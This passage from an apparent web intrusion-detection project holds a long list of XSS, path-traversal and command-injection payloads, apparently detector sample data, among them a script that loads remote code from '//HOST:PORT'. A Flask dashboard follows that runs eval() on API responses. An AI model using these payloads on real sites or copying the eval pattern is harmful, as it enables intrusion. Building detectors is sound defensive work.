src=test.vml#xss></vmlframe>\n1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>\n<a style=\"behavior:url(#default#AnchorClick);\" folder=\"javascript:alert(1)\">XXX</a>\n<!--<img src=\"--><img src=x onerror=alert(1)//\">\n<comment><img src=\"</comment><img src=x onerror=alert(1)//\">\n<!-- up to Opera 11.52, FF 3.6.28 --><![><img src=\"]><img src=x onerror=alert(1)//\"><!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+  --><svg><![CDATA[><image xlink:href=\"]]><img src=xx:x onerror=alert(2)//\"></svg>\n<style><img src=\"</style><img src=x onerror=alert(1)//\">\n<li style=list-style:url() onerror=alert(1)></li><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>\n<head><base href=\"javascript://\"/></head><body><a href=\"/. /,alert(1)//#\">XXX</a></body>\n<?xml version=\"1.0\" standalone=\"no\"?><html xmlns=\"http://www.w3.org/1999/xhtml\"><head><style type=\"text/css\">@font-face {font-family: y; src: url(\"font.svg#x\") format(\"svg\");} body {font: 100px \"y\";}</style></head><body>Hello</body></html>\n<style>*[{}@import'test.css?]{color: green;}</style>X\n<div style=\"font-family:'foo[a];color:red;';\">XXX</div>\n<div style=\"font-family:foo}color=red;\">XXX</div>\n<svg xmlns=\"http://www.w3.org/2000/svg\"><script>alert(1)</script></svg>\n<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>\n<OBJECT CLASSID=\"clsid:333C7BC4-460F-11D0-BC04-0080C7055A83\"><PARAM NAME=\"DataURL\" VALUE=\"javascript:alert(1)\"></OBJECT>\n<object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"></object>\n<embed src=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"></embed>\n<x style=\"behavior:url(test.sct)\">\n<xml id=\"xss\" src=\"test.htc\"></xml><label dataformatas=\"html\" datasrc=\"#xss\" datafld=\"payload\"></label>\n<script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>\n<video><source onerror=\"alert(1)\">\n<video onerror=\"alert(1)\"><source></source></video>\n<div style=\"background:url(/f#[a]oo/;color:red/*/foo.jpg);\">X</div>\n<div style=\"font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);\">X</div>\n<div id=\"x\">XXX</div><style>#x{font-family:foo[bar;color:green;}#y];color:red;{}</style>\n<x style=\"background:url('x[a];color:red;/*')\">XXX</x>\n<!--[if]><script>alert(1)</script --><!--[if<img src=x onerror=alert(2)//]> -->\n<div id=\"x\">x</div><xml:namespace prefix=\"t\"><import namespace=\"t\" implementation=\"#default#time2\"><t:set attributeName=\"innerHTML\" targetElement=\"x\" to=\"&lt;img&#11;src=x:x&#11;onerror&#11;=alert(1)&gt;\">\n<a href=\"http://attacker.org\">\t<iframe src=\"http://example.org/\"></iframe></a>\n<div draggable=\"true\" ondragstart=\"event.dataTransfer.setData('text/plain','malicious code');\">\t<h1>Drop me</h1></div><iframe src=\"http://www.example.org/dropHere.html\"></iframe>\n<iframe src=\"view-source:http://www.example.org/\" frameborder=\"0\" style=\"width:400px;height:180px\"></iframe><textarea type=\"text\" cols=\"50\" rows=\"10\"></textarea>\n<script>function makePopups(){\tfor (i=1;i<6;i++) {\t\twindow.open('popup.html','spam'+i,'width=50,height=50');\t}}</script><body><a href=\"#\" onclick=\"makePopups()\">Spam</a>\n<html xmlns=\"http://www.w3.org/1999/xhtml\"xmlns:svg=\"http://www.w3.org/2000/svg\"><body style=\"background:gray\"><iframe src=\"http://example.com/\" style=\"width:800px; height:350px; border:none; mask: url(#maskForClickjacking);\"/><svg:svg><svg:mask id=\"maskForClickjacking\" maskUnits=\"objectBoundingBox\" maskContentUnits=\"objectBoundingBox\">\t<svg:rect x=\"0.0\" y=\"0.0\" width=\"0.373\" height=\"0.3\" fill=\"white\"/>\t<svg:circle cx=\"0.45\" cy=\"0.7\" r=\"0.075\" fill=\"white\"/></svg:mask></svg:svg></body></html>\n<iframe sandbox=\"allow-same-origin allow-forms allow-scripts\" src=\"http://example.org/\"></iframe>\n<span class=foo>Some text</span><a class=bar href=\"http://www.example.org\">www.example.org</a><script src=\"http://code.jquery.com/jquery-1.4.4.js\"></script><script>$(\"span.foo\").click(function() {alert('foo');$(\"a.bar\").click();});$(\"a.bar\").click(function() {alert('bar');location=\"http://html5sec.org\";});</script>\n<script src=\"/\\example.com\\foo.js\"></script> // Safari 5.0, Chrome 9, 10<script src=\"\\\\example.com\\foo.js\"></script> // Safari 5.0\n<?xml version=\"1.0\"?><?xml-stylesheet type=\"text/xml\" href=\"#stylesheet\"?><!DOCTYPE doc [<!ATTLIST xsl:stylesheet  id    ID    #REQUIRED>]><svg xmlns=\"http://www.w3.org/2000/svg\">    <xsl:stylesheet id=\"stylesheet\" version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">        <xsl:template match=\"/\">            <iframe xmlns=\"http://www.w3.org/1999/xhtml\" src=\"javascript:alert(1)\"></iframe>        </xsl:template>    </xsl:stylesheet>    <circle fill=\"red\" r=\"40\"></circle></svg>\n<object id=\"x\" classid=\"clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598\"></object><object classid=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\" onqt_error=\"alert(1)\" style=\"behavior:url(#x);\"><param name=postdomevents /></object>\n<svg xmlns=\"http://www.w3.org/2000/svg\" id=\"x\"><listener event=\"load\" handler=\"#y\" xmlns=\"http://www.w3.org/2001/xml-events\" observer=\"x\"/><handler id=\"y\">alert(1)</handler></svg>\n<svg><style>&lt;img/src=x onerror=alert(1)// </b>\n<svg><image style='filter:url(\"data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>\")'><!--Same effect with<image filter='...'>--></svg>\n<math href=\"javascript:alert(1)\">CLICKME</math><math><!-- up to FF 13 --><maction actiontype=\"statusline#http://google.com\" xlink:href=\"javascript:alert(2)\">CLICKME</maction><!-- FF 14+ --><maction actiontype=\"statusline\" xlink:href=\"javascript:alert(3)\">CLICKME<mtext>http://http://google.com</mtext></maction></math>\n<b>drag and drop one of the following strings to the drop box:</b><br/><hr/>jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>feed:data:text/html,&#x3c;script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)&#x3c;/script>&#x3c;b><br/><hr/>feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/><div id=\"dropbox\" style=\"height: 360px;width: 500px;border: 5px solid #000;position: relative;\" ondragover=\"event.preventDefault()\">+ Drop Box +</div>\n<!doctype html><form><label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label><br><input name=\"secret\" type=\"password\"></form><!-- injection --><svg height=\"50px\"><image xmlns:xlink=\"http://www.w3.org/1999/xlink\"><set attributeName=\"xlink:href\" begin=\"accessKey(a)\" to=\"//example.com/?a\" /><set attributeName=\"xlink:href\" begin=\"accessKey(b)\" to=\"//example.com/?b\" /><set attributeName=\"xlink:href\" begin=\"accessKey(c)\" to=\"//example.com/?c\" /><set attributeName=\"xlink:href\" begin=\"accessKey(d)\" to=\"//example.com/?d\" /></image></svg>\n<!-- `<img/src=xx:xx onerror=alert(1)//--!>\n<xmp><%</xmp><img alt='%></xmp><img src=xx:x onerror=alert(1)//'><script>x='<%'</script> %>/alert(2)</script>XXX<style>*['<!--']{}</style>-->{}*{color:red}</style>\n<?xml-stylesheet type=\"text/xsl\" href=\"#\" ?><stylesheet xmlns=\"http://www.w3.org/TR/WD-xsl\"><template match=\"/\"><eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(1)</eval><if expr=\"new ActiveXObject('htmlfile').parentWindow.alert(2)\"></if></template></stylesheet>\n<form action=\"\" method=\"post\"><input name=\"username\" value=\"admin\" /><input name=\"password\" type=\"password\" value=\"secret\" /><input name=\"injected\" value=\"injected\" dirname=\"password\" /><input type=\"submit\"></form>\n<svg onload=alert(1)>\n\"><svg onload=alert(1)//\n\"onmouseover=alert(1)//\n\"autofocus/onfocus=alert(1)//\n'-alert(1)-'\n'-alert(1)//\n\\'-alert(1)//\n</script><svg onload=alert(1)>\n<x contenteditable onblur=alert(1)>lose focus! \n<x onclick=alert(1)>click this! \n<x oncopy=alert(1)>copy this! \n<x oncontextmenu=alert(1)>right click this! \n<x oncut=alert(1)>copy this! \n<x ondblclick=alert(1)>double click this! \n<x ondrag=alert(1)>drag this! \n<x contenteditable onfocus=alert(1)>focus this! \n<x contenteditable oninput=alert(1)>input here! \n<x contenteditable onkeydown=alert(1)>press any key! \n<x contenteditable onkeypress=alert(1)>press any key! \n<x contenteditable onkeyup=alert(1)>press any key! \n<x onmousedown=alert(1)>click this! \n<x onmousemove=alert(1)>hover this! \n<x onmouseout=alert(1)>hover this! \n<x onmouseover=alert(1)>hover this! \n<x onmouseup=alert(1)>click this! \n<x contenteditable onpaste=alert(1)>paste here!\n<script>alert(1)// \n<script>alert(1)<!–\n<script src=//brutelogic.com.br/1.js> \n<script src=//3334957647/1>\n%3Cx onxxx=alert(1) \n<%78 onxxx=1 \n<x %6Fnxxx=1 \n<x o%6Exxx=1 \n<x on%78xx=1 \n<x onxxx%3D1\n<X onxxx=1 \n<x OnXxx=1 \n<X OnXxx=1 \n<x onxxx=1 onxxx=1\n<x/onxxx=1 \n<x%09onxxx=1 \n<x%0Aonxxx=1 \n<x%0Conxxx=1 \n<x%0Donxxx=1 \n<x%2Fonxxx=1 \n<x 1='1'onxxx=1 \n<x 1=\"1\"onxxx=1\n<x </onxxx=1 \n<x 1=\">\" onxxx=1 \n<http://onxxx%3D1/\n<x onxxx=alert(1) 1='\n<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>\n'onload=alert(1)><svg/1='\n'>alert(1)</script><script/1=' \n*/alert(1)</script><script>/*\n*/alert(1)\">'onload=\"/*<svg/1='\n`-alert(1)\">'onload=\"`<svg/1='\n*/</script>'>alert(1)/*<script/1='\n<script>alert(1)</script> \n<script src=javascript:alert(1)> \n<iframe src=javascript:alert(1)> \n<embed src=javascript:alert(1)> \n<a href=javascript:alert(1)>click \n<math><brute href=javascript:alert(1)>click \n<form action=javascript:alert(1)><input type=submit> \n<isindex action=javascript:alert(1) type=submit value=click> \n<form><button formaction=javascript:alert(1)>click \n<form><input formaction=javascript:alert(1) type=submit value=click> \n<form><input formaction=javascript:alert(1) type=image value=click> \n<form><input formaction=javascript:alert(1) type=image src=SOURCE> \n<isindex formaction=javascript:alert(1) type=submit value=click> \n<object data=javascript:alert(1)> \n<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;> \n<svg><script xlink:href=data:,alert(1) /> \n<math><brute xlink:href=javascript:alert(1)>click \n<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>\n<html ontouchstart=alert(1)> \n<html ontouchend=alert(1)> \n<html ontouchmove=alert(1)> \n<html ontouchcancel=alert(1)>\n<body onorientationchange=alert(1)>\n\"><img src=1 onerror=alert(1)>.gif\n<svg xmlns=\"http://www.w3.org/2000/svg\" onload=\"alert(document.domain)\"/>\nGIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;\n<script src=\"data:&comma;alert(1)//\n\"><script src=data:&comma;alert(1)//\n<script src=\"//brutelogic.com.br&sol;1.js&num; \n\"><script src=//brutelogic.com.br&sol;1.js&num; \n<link rel=import href=\"data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; \n\"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;\n<base href=//0>\n<script/src=\"data:&comma;eval(atob(location.hash.slice(1)))//#alert(1)\n<body onload=alert(1)>\n<body onpageshow=alert(1)>\n<body onfocus=alert(1)>\n<body onhashchange=alert(1)><a href=#x>click this!#x\n<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x\n<body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><x id=x>#x\n<body onresize=alert(1)>press F12!\n<body onhelp=alert(1)>press F1! (MSIE)\n<marquee onstart=alert(1)>\n<marquee loop=1 width=0 onfinish=alert(1)>\n<audio src onloadstart=alert(1)>\n<video onloadstart=alert(1)><source>\n<input autofocus onblur=alert(1)>\n<keygen autofocus onfocus=alert(1)>\n<form onsubmit=alert(1)><input type=submit>\n<select onchange=alert(1)><option>1<option>2\n<menu id=x contextmenu=x onshow=alert(1)>right click me!\n<embed/:script allowscriptaccess=always src=//l0.cm/xss.swf>\n<img/onerror=alert(1)+/src/<xss>\n%0d%0adata:text/html;text,<svg/onload=prompt(1)>\n\"><img/src=\">\"onerror=confirm(123)>\n<img onerror=eval('al&#x5c;u0065rt(1)') src=a>\n<script>eval('al'+'ert(1)');</script>\n<script><script>alert(1)</script>\n<scr<script>ipt>alert(1)</script>\n<scr<object>ipt>alert(1)</script>\n&apos;; alert(1);//\n<a href=\"#\" onClick=\"var a ='foo&apos;; alert(1);//'\">Click Me</a>\n<script>eval(location.hash.slice(1)</script>\n<base href=data:/,-alert(1)/>\n<svg><set href=#script attributeName=href to=data:,alert(1)/>\n“/>.<<img src=x onerror=alert(1)//\\\"&gt;>&lt;&gt\n“>><<img src=x onerror=alert(1);//>>;\n\"text </script><script>alert(1)</script>\"\n<marquee loop=1 width=0 onfinish=1/confirm`/1/`>0</marquee>\n<marquee loop=1 width=0 onfinish=confirm(1)>0</marquee>\n<abeon style=font-size:12px onmouseover=confirm(1)>abeon\n<svg onload=location='//p0.al'>\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/ybuoueddeq.sh'); function v\n/?<script>document.cookie=\"testabrn=6368;\"</script>\n/a0imiuf1.exe?<script>document.cookie=\"testxqrn=4654;\"</script>\n/d5a5renl.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/egaet53a.pl?<script>cross_site_scripting.nasl</script>\n/pubs_description/\n/cgi-sys/windmail.exe? -n c:\\boot.ini hacker@hax0r.com | dir c:\\\\\n/examples/jsp/cal/index.php?album=../../../../../../../../../../etc/passwd\\x00\n/bl8sefdm.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">"
  },
  {
    "path": "flask/app.py",
    "content": "# coding=utf-8\nimport ast\nimport time\nfrom kafka import KafkaConsumer\nimport redis\nimport requests\n\nfrom threading import Lock, Thread\nfrom flask import Flask, render_template, session, request\nfrom flask_socketio import SocketIO, emit\n\nasync_mode = None\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'secret!'\nsocketio = SocketIO(app, async_mode=async_mode)\n\nthread = None\nthread_lock = Lock()\n\n# 配置项目\ntime_interval = 1\nkafka_bootstrap_servers = \"10.0.0.222:9092\"\nredis_con_pool = redis.ConnectionPool(host='10.0.0.222', port=6379, decode_responses=True)\n# baidu map app key, replace it with your own key\nmap_ak = ''\n\n\n# 页面路由与对应页面的ws接口\n# 系统时间\n@socketio.on('connect', namespace='/sys_time')\ndef sys_time():\n    def loop():\n        while True:\n            socketio.sleep(time_interval)\n            current_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n            socketio.emit('sys_time',\n                          {'data': current_time},\n                          namespace='/sys_time')\n\n    socketio.start_background_task(target=loop)\n\n\n# 欢迎页面\n@app.route('/')\n@app.route('/welcome')\ndef welcome():\n    return render_template('index.html', async_mode=socketio.async_mode)\n\n\n# 实时日志流\n@socketio.on('connect', namespace='/log_stream')\ndef log_stream():\n    def loop():\n        socketio.sleep(time_interval)\n        consumer = KafkaConsumer(\"raw_log\", bootstrap_servers=kafka_bootstrap_servers)\n        cache = \"\"\n        for msg in consumer:\n            cache += bytes.decode(msg.value) + \"\\n\"\n            if len(cache.split(\"\\n\")) == 25:\n                socketio.emit('log_stream',\n                              {'data': cache},\n                              namespace='/log_stream')\n                cache = \"\"\n\n    socketio.start_background_task(target=loop)\n\n\n# 实时日志分析页面\n@app.route('/analysis')\ndef analysis():\n    return render_template('analysis.html', async_mode=socketio.async_mode)\n\n\n# 实时计数器\n@socketio.on('connect', namespace='/count_board')\ndef count_board():\n    def loop():\n        while True:\n            socketio.sleep(time_interval)\n            redis_con = redis.Redis(connection_pool=redis_con_pool)\n            res = redis_con.zrange(\"statcode\", 0, 40, withscores=True)\n\n            # 总请求数（日志行数）\n            host_count = redis_con.zscore(\"line\", \"count\")\n\n            # 成功请求数（状态码属于normal的个数）\n            normal = [\"200\", \"201\", \"202\", \"203\", \"204\", \"205\", \"206\", \"207\"]\n            success_count = 0\n            for i in res:\n                if i[0] in normal:\n                    success_count += int(i[1])\n\n            # 其他请求数（其他状态码个数）\n            other_count = 0\n            for i in res:\n                other_count += int(i[1])\n            other_count -= success_count\n\n            # 访客数（不同的IP个数）\n            visitor_count = redis_con.zcard(\"host\")\n\n            # 资源数（不同的url个数）\n            url_count = redis_con.zcard(\"url\")\n\n            # 流量大小（bytes的和，MB）\n            traffic_sum = int(redis_con.zscore(\"traffic\", \"sum\"))\n\n            # 日志大小（MB）\n            log_size = int(redis_con.zscore(\"size\", \"sum\"))\n\n            socketio.emit('count_board',\n                          {'host_count': host_count,\n                           'success_count': success_count,\n                           'other_count': other_count,\n                           'visitor_count': visitor_count,\n                           'url_count': url_count,\n                           'traffic_sum': traffic_sum,\n                           'log_size': log_size},\n                          namespace='/count_board')\n\n    socketio.start_background_task(target=loop)\n\n\n# 实时热门位置\n@socketio.on('connect', namespace='/hot_geo')\ndef hot_geo():\n    def loop():\n        while True:\n            socketio.sleep(2)\n            redis_con = redis.Redis(connection_pool=redis_con_pool)\n            res = redis_con.zrevrange(\"host\", 0, 50, withscores=True)\n            data = []\n\n            for i in res:\n                # 调用接口获取地理坐标\n                req = requests.get(\"http://api.map.baidu.com/location/ip\",\n                                   {'ak': map_ak,\n                                    'ip': i[0],\n                                    'coor': 'bd09ll'})\n                body = eval(req.text)\n\n                # 仅显示境内定位\n                if body['status'] == 0:\n                    coor_x = body['content']['point']['x']\n                    coor_y = body['content']['point']['y']\n\n                    data.append({\"name\": i[0], \"value\": [coor_x, coor_y, i[1]]})\n\n            socketio.emit('hot_geo',\n                          {'data': data},\n                          namespace='/hot_geo')\n\n    socketio.start_background_task(target=loop)\n\n\n# 实时热门资源排名\n@socketio.on('connect', namespace='/hot_url')\ndef hot_url():\n    def loop():\n        while True:\n            socketio.sleep(time_interval)\n            redis_con = redis.Redis(connection_pool=redis_con_pool)\n            res = redis_con.zrevrange(\"url\", 0, 9, withscores=True)\n            data = []\n            no = 1\n\n            for i in res:\n                data.append({\"no\": no, \"url\": i[0], \"count\": i[1]})\n                no += 1\n\n            socketio.emit('hot_url',\n                          {'data': data},\n                          namespace='/hot_url')\n\n    socketio.start_background_task(target=loop)\n\n\n# 实时热门IP排名\n@socketio.on('connect', namespace='/hot_ip')\ndef hot_ip():\n    def loop():\n        while True:\n            socketio.sleep(time_interval)\n            redis_con = redis.Redis(connection_pool=redis_con_pool)\n            res = redis_con.zrevrange(\"host\", 0, 13, withscores=True)\n            data = []\n            no = 1\n\n            for i in res:\n                # 调用接口获取地理坐标\n                req = requests.get(\"http://api.map.baidu.com/location/ip\",\n                                   {'ak': map_ak,\n                                    'ip': i[0],\n                                    'coor': 'bd09ll'})\n                body = eval(req.text)\n\n                # 仅显示境内定位\n                if body['status'] == 0:\n                    address = body['content']['address']\n\n                    data.append({\"no\": no, \"ip\": i[0], \"address\": address, \"count\": i[1]})\n                    no += 1\n\n            socketio.emit('hot_ip',\n                          {'data': data},\n                          namespace='/hot_ip')\n\n    socketio.start_background_task(target=loop)\n\n\n# 实时状态码比例\n@socketio.on('connect', namespace='/status_code_pie')\ndef status_code_pie():\n    def loop():\n        while True:\n            socketio.sleep(time_interval)\n            redis_con = redis.Redis(connection_pool=redis_con_pool)\n            res = redis_con.zrevrange(\"statcode\", 0, 100, withscores=True)\n            data = []\n            legend = []\n\n            for i in res:\n                if i[0] != 'foo':\n                    data.append({\"value\": i[1], \"name\": i[0]})\n                    legend.append(i[0])\n\n            socketio.emit('status_code_pie',\n                          {'legend': legend, 'data': data},\n                          namespace='/status_code_pie')\n\n    socketio.start_background_task(target=loop)\n\n\n# 实时请求方式比例\n@socketio.on('connect', namespace='/req_method_pie')\ndef req_method_pie():\n    def loop():\n        while True:\n            socketio.sleep(time_interval)\n            redis_con = redis.Redis(connection_pool=redis_con_pool)\n            res = redis_con.zrevrange(\"reqmt\", 0, 100, withscores=True)\n            data = []\n            legend = []\n\n            for i in res:\n                if i[0] != 'foo':\n                    data.append({\"value\": i[1], \"name\": i[0]})\n                    legend.append(i[0])\n\n            socketio.emit('req_method_pie',\n                          {'legend': legend, 'data': data},\n                          namespace='/req_method_pie')\n\n    socketio.start_background_task(target=loop)\n\n\n# 实时请求计数（按时间顺序）\n@socketio.on('connect', namespace='/req_count_timeline')\ndef req_count_timeline():\n    def loop():\n        while True:\n            socketio.sleep(time_interval)\n            redis_con = redis.Redis(connection_pool=redis_con_pool)\n            res = dict(redis_con.zrange(\"datetime\", 0, 10000000, withscores=True))\n            data = []\n            date = []\n\n            # 按时间排序\n            for i in sorted(res):\n                datetime = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(int(i) / 1000))\n                data.append(res[i])\n                date.append(datetime)\n\n            socketio.emit('req_count_timeline',\n                          {\"data\": data, \"date\": date},\n                          namespace='/req_count_timeline')\n\n    socketio.start_background_task(target=loop)\n\n\n# IP请求数排序\n@socketio.on('connect', namespace='/ip_ranking')\ndef timestamp_count_timeline():\n    def loop():\n        while True:\n            socketio.sleep(time_interval)\n            redis_con = redis.Redis(connection_pool=redis_con_pool)\n            res = redis_con.zrevrange(\"host\", 0, 50, withscores=True)\n            ip = []\n            count = []\n\n            for i in res:\n                ip.append(i[0])\n                count.append(i[1])\n\n            socketio.emit('ip_ranking',\n                          {\"ip\": ip, \"count\": count},\n                          namespace='/ip_ranking')\n\n    socketio.start_background_task(target=loop)\n\n\n@app.route('/id')\ndef id():\n    return render_template(\"id.html\", async_mode=socketio.async_mode)\n\n\n# 异常请求计数\n@socketio.on('connect', namespace='/bad_count')\ndef bad_count():\n    def loop():\n        while True:\n            socketio.sleep(time_interval)\n            redis_con = redis.Redis(connection_pool=redis_con_pool)\n            res = int(redis_con.zscore(\"bad\", \"bad\"))\n\n            socketio.emit('bad_count',\n                          {\"data\": res},\n                          namespace='/bad_count')\n\n    socketio.start_background_task(target=loop)\n\n\n# 正常请求计数\n@socketio.on('connect', namespace='/good_count')\ndef bad_count():\n    def loop():\n        while True:\n            socketio.sleep(time_interval)\n            redis_con = redis.Redis(connection_pool=redis_con_pool)\n            res = int(redis_con.zscore(\"good\", \"good\"))\n\n            socketio.emit('good_count',\n                          {\"data\": res},\n                          namespace='/good_count')\n\n    socketio.start_background_task(target=loop)\n\n\n# 正常请求地理标记\n@socketio.on('connect', namespace='/good_geo')\ndef good_geo():\n    def loop():\n        while True:\n            socketio.sleep(time_interval)\n            consumer = KafkaConsumer(\"good_result\", bootstrap_servers=kafka_bootstrap_servers)\n            data = []\n\n            for msg in consumer:\n                result = ast.literal_eval(bytes.decode(msg.value))\n                for record in result:\n                    if record['host'] != \"foo\":\n                        # 调用接口获取地理坐标\n                        req = requests.get(\"http://api.map.baidu.com/location/ip\",\n                                           {'ak': map_ak,\n                                            'ip': record['host'],\n                                            'coor': 'bd09ll'})\n                        body = eval(req.text)\n                        # 仅显示境内定位\n                        if body['status'] == 0:\n                            coor_x = body['content']['point']['x']\n                            coor_y = body['content']['point']['y']\n                            datetime = time.strftime(\"%Y-%m-%d %H:%M:%S\",\n                                                     time.localtime(int(record['timestamp']) / 1000))\n\n                            data.append({\"name\": record['host'], \"value\": [coor_x, coor_y,\n                                                                           record['url'],\n                                                                           datetime,\n                                                                           record['req_method'],\n                                                                           record['protocol'],\n                                                                           record['status_code']]})\n                            socketio.emit('good_geo',\n                                          {\"data\": data},\n                                          namespace='/good_geo')\n\n    socketio.start_background_task(target=loop)\n\n\n# 异常请求地理标记\n@socketio.on('connect', namespace='/bad_geo')\ndef bad_geo():\n    def loop():\n        while True:\n            socketio.sleep(time_interval)\n            consumer = KafkaConsumer(\"bad_result\", bootstrap_servers=kafka_bootstrap_servers)\n            data = []\n\n            for msg in consumer:\n                result = ast.literal_eval(bytes.decode(msg.value))\n                for record in result:\n                    if record['host'] != \"foo\":\n                        # 调用接口获取地理坐标\n                        req = requests.get(\"http://api.map.baidu.com/location/ip\",\n                                           {'ak': map_ak,\n                                            'ip': record['host'],\n                                            'coor': 'bd09ll'})\n                        body = eval(req.text)\n                        # 仅显示境内定位\n                        if body['status'] == 0:\n                            coor_x = body['content']['point']['x']\n                            coor_y = body['content']['point']['y']\n                            datetime = time.strftime(\"%Y-%m-%d %H:%M:%S\",\n                                                     time.localtime(int(record['timestamp']) / 1000))\n\n                            data.append({\"name\": record['host'], \"value\": [coor_x, coor_y,\n                                                                           record['url'],\n                                                                           datetime,\n                                                                           record['req_method'],\n                                                                           record['protocol'],\n                                                                           record['status_code']]})\n                            socketio.emit('bad_geo',\n                                          {\"data\": data},\n                                          namespace='/bad_geo')\n\n    socketio.start_background_task(target=loop)\n\n\n# 实时入侵分类计数（按时间顺序）\n@socketio.on('connect', namespace='/url_cate_count_timeline')\ndef url_cate_count_timeline():\n    def loop():\n        while True:\n            socketio.sleep(time_interval)\n            redis_con = redis.Redis(connection_pool=redis_con_pool)\n            good_res = dict(redis_con.zrange(\"goodts\", 0, 10000000, withscores=True))\n            bad_res = dict(redis_con.zrange(\"badts\", 0, 10000000, withscores=True))\n\n            # 求正常和异常结果的时间戳的并集，并排序。再生成对应的正常和异常计数\n            date = []\n            date_ts = []\n            good_date = []\n            bad_date = []\n\n            good_data = []\n            bad_data = []\n            # 求并集并排序\n            for i in good_res:\n                good_date.append(i)\n            for j in bad_res:\n                bad_date.append(j)\n            for k in sorted(list(set(good_date) | set(bad_date))):\n                date_ts.append(k)\n\n            # 生成对应的计数\n            for t in date_ts:\n                if t in good_res:\n                    good_data.append(good_res[t])\n                else:\n                    good_data.append(0)\n                if t in bad_res:\n                    bad_data.append(bad_res[t])\n                else:\n                    bad_data.append(0)\n            # 时间戳转字符串\n            for ts in date_ts:\n                date.append(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(int(ts) / 1000)))\n\n            socketio.emit('url_cate_count_timeline',\n                          {\"date\": date, \"good_data\": good_data, \"bad_data\": bad_data},\n                          namespace='/url_cate_count_timeline')\n\n    socketio.start_background_task(target=loop)\n\n\n# 实时异常请求概览\n@socketio.on('connect', namespace='/bad_detail')\ndef bad_detail():\n    def loop():\n        while True:\n            socketio.sleep(time_interval)\n            consumer = KafkaConsumer(\"bad_result\", bootstrap_servers=kafka_bootstrap_servers)\n            data = []\n\n            for msg in consumer:\n                result = ast.literal_eval(bytes.decode(msg.value))\n                for record in result:\n                    if record['host'] != \"foo\":\n                        # 调用接口获取地理坐标\n                        req = requests.get(\"http://api.map.baidu.com/location/ip\",\n                                           {'ak': map_ak,\n                                            'ip': record['host'],\n                                            'coor': 'bd09ll'})\n                        body = eval(req.text)\n                        # 仅显示境内定位\n                        if body['status'] == 0:\n                            address = body['content']['address']\n\n                            datetime = time.strftime(\"%Y-%m-%d %H:%M:%S\",\n                                                     time.localtime(int(record['timestamp']) / 1000))\n\n                            data.append({\"host\": record['host'], \"address\": address, \"url\": record['url'],\n                                         \"datetime\": datetime, \"req_method\": record['req_method'],\n                                         \"protocol\": record['protocol'], \"status_code\": record['status_code'],\n                                         \"pred\": record['prediction'], 'prob': record['probability']['values']})\n\n                            socketio.emit('bad_detail',\n                                          {\"data\": data},\n                                          namespace='/bad_detail')\n    socketio.start_background_task(target=loop)\n\n\n# 实时正常请求概览\n@socketio.on('connect', namespace='/good_detail')\ndef good_detail():\n    def loop():\n        while True:\n            socketio.sleep(time_interval)\n            consumer = KafkaConsumer(\"good_result\", bootstrap_servers=kafka_bootstrap_servers)\n            data = []\n\n            for msg in consumer:\n                result = ast.literal_eval(bytes.decode(msg.value))\n                for record in result:\n                    if record['host'] != \"foo\":\n                        # 调用接口获取地理坐标\n                        req = requests.get(\"http://api.map.baidu.com/location/ip\",\n                                           {'ak': map_ak,\n                                            'ip': record['host'],\n                                            'coor': 'bd09ll'})\n                        body = eval(req.text)\n                        # 仅显示境内定位\n                        if body['status'] == 0:\n                            address = body['content']['address']\n\n                            datetime = time.strftime(\"%Y-%m-%d %H:%M:%S\",\n                                                     time.localtime(int(record['timestamp']) / 1000))\n\n                            data.append({\"host\": record['host'], \"address\": address, \"url\": record['url'],\n                                         \"datetime\": datetime, \"req_method\": record['req_method'],\n                                         \"protocol\": record['protocol'], \"status_code\": record['status_code'],\n                                         \"pred\": record['prediction'], 'prob': record['probability']['values']})\n\n                            socketio.emit('good_detail',\n                                          {\"data\": data},\n                                          namespace='/good_detail')\n    socketio.start_background_task(target=loop)\n\n\n@app.route('/about')\ndef about():\n    return render_template(\"about.html\", async_mode=socketio.async_mode)\n\n\nif __name__ == '__main__':\n    socketio.run(app, host=\"0.0.0.0\", port=5000, debug=True)\n"
